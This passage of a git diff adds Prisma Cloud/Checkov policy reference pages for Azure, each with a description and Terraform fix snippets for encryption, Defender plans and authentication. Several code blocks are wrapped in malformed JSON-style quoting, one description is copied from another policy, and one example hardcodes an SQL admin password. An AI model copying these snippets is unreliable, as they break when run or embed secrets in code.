+. To alter the security policy for a subscription, click *Edit Settings*.
+
+. Select the *Pricing tier* blade.
+
+. Select *Standard*.
+
+. Select *Save*.
+ + +* CLI Command* + + +To set the * Pricing Tier* to * Standard*, use the following command: + + +[source,shell] +---- +{ + "az account get-access-token +--query +"{subscription:subscription,accessToken:accessToken}" +--out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: +application/json" +https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/pr +icings/default?api-version=2017-08-01-preview -d@"input.json"'", +} +---- + +Where * input.json* contains the * Request body json data*, detailed below. + + +[source,shell] +---- +{ + "{ + "id": +"/subscriptions/& lt;Your_Subscription_Id>/providers/Microsoft.Security/pricings/ +default", + "name": "default", + "type": "Microsoft.Security/pricings", + "properties": { + "pricingTier": "Standard" + } + +}", + +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* tier + + +[source,go] +---- +{ + "resource "azurerm_security_center_subscription_pricing" "example" { + - tier = "Free" + + tier = "Standard" +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc new file mode 100644 index 000000000..b3dc3ce75 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc @@ -0,0 +1,114 @@ +== Storage for critical data are not encrypted with Customer Managed Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 03752d85-99fb-4972-87b7-7d10db4cfd59 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml[CKV2_AZURE_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable sensitive data encryption at rest using Customer Managed Keys (CMKs) rather than Microsoft Managed keys. +By default, data in the storage account is encrypted using Microsoft Managed Keys at rest. +All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. +All object metadata is also encrypted. +However, if you want to control and manage this encryption key yourself, you can specify a customer-managed key; that key is then used to protect and control access to the key that encrypts your data. +You can also choose to automatically update the key version used for Azure Storage encryption whenever a new version is available in the associated Key Vault. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_key_vault, azurerm_key_vault_access_policy, azurerm_key_vault_key, azurerm_storage_account, azurerm_storage_account_customer_managed_key + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_key_vault" "example" { + name = "examplekv" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" + + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_access_policy" "client" { + key_vault_id = azurerm_key_vault.example.id + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id + + key_permissions = ["get", "create", "delete", "list", "restore", "recover", "unwrapkey", "wrapkey",
"purge", "encrypt", "decrypt", "sign", "verify"] + secret_permissions = ["get"] +} + + +resource "azurerm_key_vault_key" "example" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.example.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] + + depends_on = [ + azurerm_key_vault_access_policy.client + ] +} + + + +resource "azurerm_storage_account" "ok_storage_account" { + name = "examplestor" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + account_tier = "Standard" + account_replication_type = "GRS" + + identity { + type = "SystemAssigned" + } + +} + + +resource "azurerm_storage_account_customer_managed_key" "ok_cmk" { + storage_account_id = azurerm_storage_account.ok_storage_account.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc new file mode 100644 index 000000000..71d158c01 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc @@ -0,0 +1,53 @@ +== Active Directory is not used for authentication for Service Fabric + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a34620b2-df70-4dfc-964d-dde263c6c80f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py[CKV_AZURE_125] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A Service Fabric cluster 
requires creating Azure Active Directory (AD) applications to control access to the cluster: one web application and one native application. +After the applications are created, you will be required to assign users to read-only and admin roles. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_service_fabric_cluster +* *Arguments:* azure_active_directory - (Optional) An azure_active_directory block as defined below. + + +[source,go] +---- +resource "azurerm_service_fabric_cluster" "example" { + ... + + azure_active_directory { + + tenant_id = "tenant" + } + ... + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc new file mode 100644 index 000000000..606287e59 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-app-services-use-azure-files.adoc @@ -0,0 +1,58 @@ +== App services do not use Azure files +// App services do not use Azure Files + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5fffbe0b-dafe-4774-b8de-dad2231047c3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py[CKV_AZURE_88] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The content directory of an app service should be located on an Azure file share. +The storage account information for the file share must be provided before any publishing activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* storage_account.type + + +[source,go] +---- +{ + "resource "azurerm_app_service" "example" { + ... + + storage_account { + name = "test_name" + + type = "AzureFiles" + ... 
+ } + + }", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc new file mode 100644 index 000000000..6e8928a52 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc @@ -0,0 +1,53 @@ +== Automatic OS image patching is disabled for Virtual Machine scale sets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7575f87-132a-44f9-bb75-a32c8fede437 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py[CKV_AZURE_95] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy enforces enabling automatic OS image patching on Virtual Machine Scale Sets to always keep Virtual Machines secure by safely applying latest security patches every month. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_virtual_machine_scale_set +* *Arguments:* automatic_os_upgrade + + +[source,go] +---- +{ + " resource "azurerm_virtual_machine_scale_set" "example" { + ... + + automatic_os_upgrade = true + ... 
+ }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc new file mode 100644 index 000000000..99dd894e0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-automation-account-variables-are-encrypted.adoc @@ -0,0 +1,69 @@ +== Azure Automation account variables are not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fe857a62-4d04-4429-bd45-e502ccbd5c8d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AutomationEncrypted.py[CKV_AZURE_73] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +If you have Automation Account Variables storing sensitive data that are not already encrypted, then you will need to delete them and recreate them as encrypted variables. +//// +=== Fix - Runtime + + +* In Azure CLI* + + + + +[source,text] +---- +{ + "Set-AzAutomationVariable -AutomationAccountName '{AutomationAccountName}' -Encrypted $true -Name '{VariableName}' -ResourceGroupName '{ResourceGroupName}' -Value '{Value}'", +} +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_automation_variable_int +* *Arguments:* encrypted + + +[source,go] +---- +{ + "resource "azurerm_automation_variable_int" "example" { + ... 
++ encrypted = true +}", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc new file mode 100644 index 000000000..140673edb --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-active-directory-admin-is-configured.adoc @@ -0,0 +1,88 @@ +== Azure SQL servers which do not have Azure Active Directory admin configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 22c0440e-dadc-4368-ac9a-404edc6417cd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml[CKV2_AZURE_7] + +|Severity +|LOW + +|Subtype +|Build +//,Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use Azure Active Directory Authentication for authentication with SQL Database. +Azure Active Directory authentication is a mechanism to connect to Microsoft Azure SQL Database and SQL Data Warehouse by using identities in Azure Active Directory (Azure AD). +With Azure AD authentication, identities of database users and other Microsoft services can be managed in one central location. +Central ID management provides a single place to manage database users and simplifies permission management. +* It provides an alternative to SQL Server authentication. +* It helps stop the proliferation of user identities across database servers. +* It allows password rotation in a single place. +* Customers can manage database permissions using external (AAD) groups. +* It can eliminate storing passwords by enabling integrated Windows authentication and other forms of authentication supported by Azure Active Directory.
+* Azure AD authentication uses contained database users to authenticate identities at the database level. +* Azure AD supports token-based authentication for applications connecting to SQL Database. +* Azure AD authentication supports ADFS (domain federation) or native user/password authentication for a local Azure Active Directory without domain synchronization. +* Azure AD supports connections from SQL Server Management Studio that use Active Directory Universal Authentication, which includes Multi-Factor Authentication (MFA). +MFA includes strong authentication with a range of easy verification options -- phone call, text message, smart cards with pin, or mobile app notification. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_sql_active_directory_administrator +* *Arguments:* server_name (of azurerm_sql_active_directory_administrator) + + +[source,go] +---- +data "azurerm_client_config" "current" {} + +resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "sql_server_good" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + + +resource "azurerm_sql_active_directory_administrator" "example" { ++ server_name = azurerm_sql_server.sql_server_good.name + resource_group_name = azurerm_resource_group.example.name + login = "sqladmin" + tenant_id = data.azurerm_client_config.current.tenant_id + object_id = data.azurerm_client_config.current.object_id +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc
b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc new file mode 100644 index 000000000..17c6b6310 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc @@ -0,0 +1,55 @@ +== Azure Batch account does not use key vault to encrypt data + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a43a61b-ebce-4d88-a9d5-90d6affb1431 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py[CKV_AZURE_76] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your Batch account data. +By default, customer data is encrypted with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_batch_account +* *Arguments:* key_vault_reference + + +[source,go] +---- +resource "azurerm_batch_account" "example" { + ... 
++ key_vault_reference { + id = "test" + url = "https://test.com" + } + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc new file mode 100644 index 000000000..702ccc9a0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc @@ -0,0 +1,74 @@ +== Azure Data Explorer encryption at rest does not use a customer-managed key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f62f5111-f43b-442f-93fd-1b9b5625392d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml[CKV2_AZURE_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling encryption at rest using a customer-managed key on your Azure Data Explorer cluster provides additional control over the key being used by the encryption at rest. +This feature is often applicable to customers with special compliance requirements and requires a Key Vault to manage the keys.
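Because CKV2_AZURE_11 is a graph check, it reasons about pairs of resources rather than a single block: a cluster passes only if some azurerm_kusto_cluster_customer_managed_key resource points at it. A minimal sketch of that idea in Python (simplified resource dictionaries with assumed keys, not Checkov's graph API):

```python
def clusters_without_cmk(resources: list) -> list:
    # IDs of clusters that some customer-managed-key resource references.
    covered = {
        r["cluster_id"]
        for r in resources
        if r["type"] == "azurerm_kusto_cluster_customer_managed_key"
    }
    # Clusters whose id appears in no customer-managed-key resource fail.
    return [
        r["name"]
        for r in resources
        if r["type"] == "azurerm_kusto_cluster" and r["id"] not in covered
    ]
```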
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster, azurerm_kusto_cluster_customer_managed_key +* *Arguments:* cluster_id (of _azurerm_kusto_cluster_customer_managed_key_ ) + + +[source,go] +---- +{ + "resource "azurerm_kusto_cluster" "cluster_ok" { + name = "kustocluster" + location = azurerm_resource_group.rg.location + resource_group_name = azurerm_resource_group.rg.name + + sku { + name = "Standard_D13_v2" + capacity = 2 + } + + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_kusto_cluster_customer_managed_key" "example" { + cluster_id = azurerm_kusto_cluster.cluster_ok.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name + key_version = azurerm_key_vault_key.example.version +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc new file mode 100644 index 000000000..6989954d0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption.adoc @@ -0,0 +1,53 @@ +== Azure Data Explorer does not use disk encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dcdc7713-2f14-447b-a8ce-9fe991e1a71c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py[CKV_AZURE_74] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling encryption at rest using a customer-managed key on your Azure Data Explorer cluster provides additional control over the key being used by the encryption at rest. 
+This feature is often applicable to customers with special compliance requirements and requires a Key Vault to manage the keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster +* *Arguments:* enable_disk_encryption + + +[source,go] +---- +resource "azurerm_kusto_cluster" "example" { + ... + + enable_disk_encryption = true +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc new file mode 100644 index 000000000..1645fb659 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption.adoc @@ -0,0 +1,53 @@ +== Azure Data Explorer does not use double encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5baf83d2-8762-4269-aebd-5c3663652da0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py[CKV_AZURE_75] + +|Severity +|LOW + +|Subtype
+|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling double encryption helps protect and safeguard your data to meet your organizational security and compliance commitments. +When double encryption has been enabled, data in the storage account is encrypted twice, once at the service level and once at the infrastructure level, using two different encryption algorithms and two different keys. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kusto_cluster +* *Arguments:* double_encryption_enabled + + +[source,go] +---- +resource "azurerm_kusto_cluster" "example" { + ... ++ double_encryption_enabled = true +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc new file mode 100644 index 000000000..99c52ba9b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc @@ -0,0 +1,64 @@ +== Azure data factories are not encrypted with a customer-managed key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 76436a36-e177-400f-8a7b-9d116f4d9340 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml[CKV2_AZURE_15] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use customer-managed keys to manage the encryption at rest of your Azure Data Factory. +By default, customer data is encrypted with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. +Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. +You have full control and responsibility for the key lifecycle, including rotation and management.
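Like the other CKV2 policies, this is a graph check: a data factory passes only when a key-vault linked service names it. The pairing logic can be sketched in Python (illustrative only; the dictionary keys mirror the Terraform arguments and are an assumed shape, not Checkov's API):

```python
def factories_missing_key_vault(factories: list, linked_services: list) -> list:
    # Factory names referenced by some
    # azurerm_data_factory_linked_service_key_vault resource.
    linked = {s.get("data_factory_name") for s in linked_services}
    # Factories with no key-vault linked service fail the check.
    return [f["name"] for f in factories if f["name"] not in linked]
```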
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory, azurerm_data_factory_linked_service_key_vault +* *Arguments:* data_factory_name (of _azurerm_data_factory_linked_service_key_vault_ ) + + +[source,go] +---- +{ + "resource "azurerm_data_factory" "data_factory_good" { + name = "example" + location = "location" + resource_group_name = "group" +} + + +resource "azurerm_data_factory_linked_service_key_vault" "factory_good" { + name = "example" + resource_group_name = "example" + data_factory_name = azurerm_data_factory.data_factory_good.name + key_vault_id = "123456" +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc new file mode 100644 index 000000000..ad8f0e722 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc @@ -0,0 +1,58 @@ +== Azure Data Factory does not use Git repository for source control + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0bebac00-c052-496f-b226-3cfddcc71c9c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py[CKV_AZURE_103] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Data Factory is an ETL service for serverless data integration and data transformation. Git is a version control system that allows for easier change tracking and collaboration. + +Azure Data Factory allows you to configure a Git repository with either Azure Repos or GitHub. 
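The condition reduces to the presence of a source-control block on the resource. A hedged Python sketch (assumed dict shape; treating an Azure Repos `vsts_configuration` block as satisfying the check is an assumption based on the resource's arguments, not confirmed from the check's source):

```python
def uses_git_repository(data_factory: dict) -> bool:
    # Pass when the factory declares either supported source-control block.
    return (
        "github_configuration" in data_factory
        or "vsts_configuration" in data_factory
    )
```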
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_data_factory +* *Arguments:* github_configuration - (Optional) A github_configuration block as defined below. + + +[source,go] +---- +resource "azurerm_data_factory" "example" { + .... + github_configuration { + account_name = "${var.account_name}" + branch_name = "${var.branch_name}" + git_url = "${var.git_url}" + repository_name = "${var.repository_name}" + root_folder = "${var.root_folder}" + } + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc new file mode 100644 index 000000000..b86aacfb0 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for App Service + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8953512c-4b2f-4622-a3c8-fff004bfec66 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py[CKV_AZURE_61] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes an agent-based deployment to analyze signals from Azure network fabric and the service control plane to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for App Service detects attacks targeting applications running over App Service.
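For the family of Defender-plan checks, the pass condition can be sketched in plain Python. This is illustrative only and follows the comma-separated `resource_type` string used in this document's examples (an assumed shape, not the provider's schema):

```python
def defender_enabled_for(pricings: list, plan: str) -> bool:
    # True if any security-center pricing resource sets the Standard tier
    # and lists the requested Defender plan in its resource_type string.
    return any(
        p.get("tier") == "Standard"
        and plan in p.get("resource_type", "").split(",")
        for p in pricings
    )
```

With the document's example resource, `defender_enabled_for(pricings, "AppServices")` passes, while a `Free` tier or a missing plan name fails.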
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `AppServices` is declared to pass this check. + + +[source,go] +---- +resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc new file mode 100644 index 000000000..094759739 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for Azure SQL Databases + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c3f78c20-8967-47a0-a02b-1efc3810c666 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py[CKV_AZURE_69] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes an agent-based deployment to analyze signals from Azure network fabric and the service control plane to detect threats across all Azure resources. +It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded).
+Azure Defender for SQL servers on machines extends the protections for your Azure-native SQL Servers to fully support hybrid environments and protect SQL servers (all supported versions) hosted in Azure. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `SqlServers` and `SqlServerVirtualMachines` are declared to pass this check. + + +[source,go] +---- +resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc new file mode 100644 index 000000000..77891d85b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc @@ -0,0 +1,56 @@ +== Azure Microsoft Defender for Cloud is set to Off for Container Registries + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| be240ec3-9d49-4f6b-a40c-fd1bf1bf0783 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py[CKV_AZURE_86] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes an agent-based deployment to analyze signals from Azure network fabric and the service control plane to detect threats across all Azure resources.
+It can also analyze non-Azure resources, utilizing Azure Arc, including those on-premises and in both AWS and GCP (once they've been onboarded). +Azure Defender for container registries includes a vulnerability scanner to scan the images in Azure Resource Manager-based Azure Container Registry registries and provide deeper visibility into image vulnerabilities. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_subscription_pricing +* *Arguments:* resource_type - (Required) The resource type this setting affects. + +Ensure that `ContainerRegistry` is declared to pass this check. + + +[source,go] +---- +resource "azurerm_security_center_subscription_pricing" "example" { + tier = "Standard" + resource_type = "AppServices,ContainerRegistry,KeyVaults,KubernetesService,SqlServers,SqlServerVirtualMachines,StorageAccounts,VirtualMachines,ARM,DNS" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc new file mode 100644 index 000000000..50dc3412a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc @@ -0,0 +1,57 @@ +== Azure Microsoft Defender for Cloud is set to Off for Key Vault + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9706338d-291b-4937-be1e-752e251ac5a7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py[CKV_AZURE_87] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender is a cloud workload protection service that utilizes an agent-based deployment to analyze signals from Azure network
